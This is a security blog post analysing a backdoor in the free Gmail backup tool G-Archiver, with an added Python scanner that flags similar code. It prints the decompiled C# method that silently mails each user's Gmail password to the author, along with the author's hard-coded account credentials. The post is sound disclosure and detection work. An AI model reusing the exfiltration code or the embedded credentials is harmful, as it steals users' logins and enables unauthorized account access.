Backdoor in G-Archiver

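While inspecting a free Gmail backup tool called G-Archiver, a programmer found that the program not only had the author's Gmail login credentials built in, but was also quietly collecting and sending users' Gmail login information. This behavior reveals a case of information leakage without user consent.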

Here is another data point that simple backdoors are being placed into free applications. A programmer, Dustin Brooks, was inspecting a free Gmail backup utility, called G-Archiver, with Reflector and noticed that not only did it have the author's Gmail credentials baked in, but it was sending the Gmail credentials of every user of the program to the author.
This is an example of an unintended network activity backdoor where information leakage occurs. Here is the code:

    // a = the user's Gmail username, b = the user's Gmail password
    public static void CheckConnection(string a, string b)
    {
        try
        {
            MailMessage message = new MailMessage();
            message.To.Add("JTerry79@gmail.com");
            message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
            message.Subject = "Account";
            message.SubjectEncoding = Encoding.UTF8;
            message.Body = "Username: " + a;
            message.Body = message.Body + "/r/nPassword: " + b;
            message.BodyEncoding = Encoding.UTF8;
            message.IsBodyHtml = false;
            message.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient();
            // Author's own account credentials, hard-coded in the binary
            client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
            client.Port = 0x24b; // 587, the SMTP submission port
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            client.Send(message);
        }
        catch (Exception)
        {
            // Empty handler: any failure to send is hidden from the user
        }
    }

This obviously wasn't the smartest backdoor. The writer didn't need to use the same credentials for his "drop" account to send the mail. That made it trivial for the investigator to verify what was going on. There was also no attempt at obfuscation.
As an internet community we don't yet have a good way of dealing with these problems except to hope that someone will inspect the free software at some point, alert people, and then hope that all the people who downloaded the software get contacted so that they can change their Gmail credentials. With other stolen data there is no recourse.
We are stuck in a blacklist mentality for software. People readily download, install, or increasingly often with SaaS, just browse, and type in their credentials. Unless users are stopped by a blacklist tool or service they end up taking an unknown risk.
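The kind of inspection described above can be given a cheap first pass. The following is an added example, not code from the original post or from G-Archiver: it scans decompiled C# text for the combination seen here (embedded SMTP credentials, a fixed recipient, a send call, an empty catch). The rule names, `scan`, `verdict` and the sample are hypothetical or constructed, and regex matching is only a heuristic.

```python
import re

# Constructed sample modelled on the method above; all values are placeholders.
SAMPLE = '''
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        message.To.Add("drop@example.com");
        SmtpClient client = new SmtpClient();
        client.Credentials = new NetworkCredential("drop@example.com", "PLACEHOLDER");
        client.Send(message);
    }
    catch (Exception)
    {
    }
}
'''

# Hypothetical rule names; each regex is a heuristic over decompiled C# text.
RULES = {
    "hardcoded-credential": re.compile(r'new\s+NetworkCredential\s*\(\s*"[^"]*"\s*,\s*"[^"]*"'),
    "hardcoded-recipient": re.compile(r'\.To\.Add\s*\(\s*"[^"@]+@[^"]+"\s*\)'),
    "smtp-send": re.compile(r'\bSmtpClient\b[\s\S]*?\.Send\s*\('),
    "swallowed-exception": re.compile(r'catch\s*(\([^)]*\))?\s*\{\s*\}'),
}
# Blog copies of code often carry typographic quotes; map them 1:1 to ASCII.
QUOTES = str.maketrans("\u201c\u201d\u2033", '"""')

def scan(source):
    """Return {rule name: [1-based line numbers]} for every rule that matches."""
    text = source.translate(QUOTES)
    hits = {}
    for name, rx in RULES.items():
        lines = [text.count("\n", 0, m.start()) + 1 for m in rx.finditer(text)]
        if lines:
            hits[name] = lines
    return hits

def verdict(hits):
    """Escalate when mail goes to a fixed address using embedded credentials."""
    exfil = {"hardcoded-credential", "hardcoded-recipient", "smtp-send"}
    if exfil.issubset(hits):
        return "review: fixed-recipient mail sent with embedded credentials"
    return "suspicious" if hits else "clean"

if __name__ == "__main__":
    print(scan(SAMPLE), verdict(scan(SAMPLE)))
```

A hit is a reason to read the flagged method by hand, not a finding on its own; legitimate "send feedback" features can match the same rules.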